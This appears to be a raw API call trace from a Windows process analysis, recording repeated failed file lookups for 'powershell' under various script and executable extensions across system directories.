	[0339.944] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0339.944] SetErrorMode (uMode=0x1) returned 0x1
	[0339.944] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0339.952] SetErrorMode (uMode=0x1) returned 0x1
	[0339.953] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0339.953] SetErrorMode (uMode=0x1) returned 0x1
	[0339.953] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0340.779] SetErrorMode (uMode=0x1) returned 0x1
	[0340.780] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0340.780] SetErrorMode (uMode=0x1) returned 0x1
	[0340.780] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0340.788] SetErrorMode (uMode=0x1) returned 0x1
	[0340.790] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0340.790] SetErrorMode (uMode=0x1) returned 0x1
	[0340.790] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0340.798] SetErrorMode (uMode=0x1) returned 0x1
	[0340.799] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0340.799] SetErrorMode (uMode=0x1) returned 0x1
	[0340.799] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0340.807] SetErrorMode (uMode=0x1) returned 0x1
	[0340.809] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0340.809] SetErrorMode (uMode=0x1) returned 0x1
	[0340.809] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.379] SetErrorMode (uMode=0x1) returned 0x1
	[0341.380] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.380] SetErrorMode (uMode=0x1) returned 0x1
	[0341.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.388] SetErrorMode (uMode=0x1) returned 0x1
	[0341.390] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.390] SetErrorMode (uMode=0x1) returned 0x1
	[0341.390] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.398] SetErrorMode (uMode=0x1) returned 0x1
	[0341.399] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.399] SetErrorMode (uMode=0x1) returned 0x1
	[0341.400] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.407] SetErrorMode (uMode=0x1) returned 0x1
	[0341.409] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.409] SetErrorMode (uMode=0x1) returned 0x1
	[0341.409] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.417] SetErrorMode (uMode=0x1) returned 0x1
	[0341.418] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.418] SetErrorMode (uMode=0x1) returned 0x1
	[0341.418] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.748] SetErrorMode (uMode=0x1) returned 0x1
	[0341.749] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0341.749] SetErrorMode (uMode=0x1) returned 0x1
	[0341.750] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.756] SetErrorMode (uMode=0x1) returned 0x1
	[0341.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.758] SetErrorMode (uMode=0x1) returned 0x1
	[0341.758] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.758] SetErrorMode (uMode=0x1) returned 0x1
	[0341.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.758] SetErrorMode (uMode=0x1) returned 0x1
	[0341.758] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.759] SetErrorMode (uMode=0x1) returned 0x1
	[0341.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.759] SetErrorMode (uMode=0x1) returned 0x1
	[0341.759] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.759] SetErrorMode (uMode=0x1) returned 0x1
	[0341.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.760] SetErrorMode (uMode=0x1) returned 0x1
	[0341.760] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.760] SetErrorMode (uMode=0x1) returned 0x1
	[0341.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.760] SetErrorMode (uMode=0x1) returned 0x1
	[0341.760] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.761] SetErrorMode (uMode=0x1) returned 0x1
	[0341.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.761] SetErrorMode (uMode=0x1) returned 0x1
	[0341.761] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.761] SetErrorMode (uMode=0x1) returned 0x1
	[0341.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.762] SetErrorMode (uMode=0x1) returned 0x1
	[0341.762] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.762] SetErrorMode (uMode=0x1) returned 0x1
	[0341.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.762] SetErrorMode (uMode=0x1) returned 0x1
	[0341.762] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.762] SetErrorMode (uMode=0x1) returned 0x1
	[0341.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.763] SetErrorMode (uMode=0x1) returned 0x1
	[0341.763] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.763] SetErrorMode (uMode=0x1) returned 0x1
	[0341.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.763] SetErrorMode (uMode=0x1) returned 0x1
	[0341.763] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.764] SetErrorMode (uMode=0x1) returned 0x1
	[0341.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.764] SetErrorMode (uMode=0x1) returned 0x1
	[0341.764] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.764] SetErrorMode (uMode=0x1) returned 0x1
	[0341.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.764] SetErrorMode (uMode=0x1) returned 0x1
	[0341.764] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.765] SetErrorMode (uMode=0x1) returned 0x1
	[0341.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.765] SetErrorMode (uMode=0x1) returned 0x1
	[0341.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.765] SetErrorMode (uMode=0x1) returned 0x1
	[0341.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.766] SetErrorMode (uMode=0x1) returned 0x1
	[0341.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.766] SetErrorMode (uMode=0x1) returned 0x1
	[0341.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0341.766] SetErrorMode (uMode=0x1) returned 0x1
	[0341.767] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.767] SetErrorMode (uMode=0x1) returned 0x1
	[0341.767] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.767] SetErrorMode (uMode=0x1) returned 0x1
	[0341.767] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.768] SetErrorMode (uMode=0x1) returned 0x1
	[0341.780] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.780] SetErrorMode (uMode=0x1) returned 0x1
	[0341.781] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
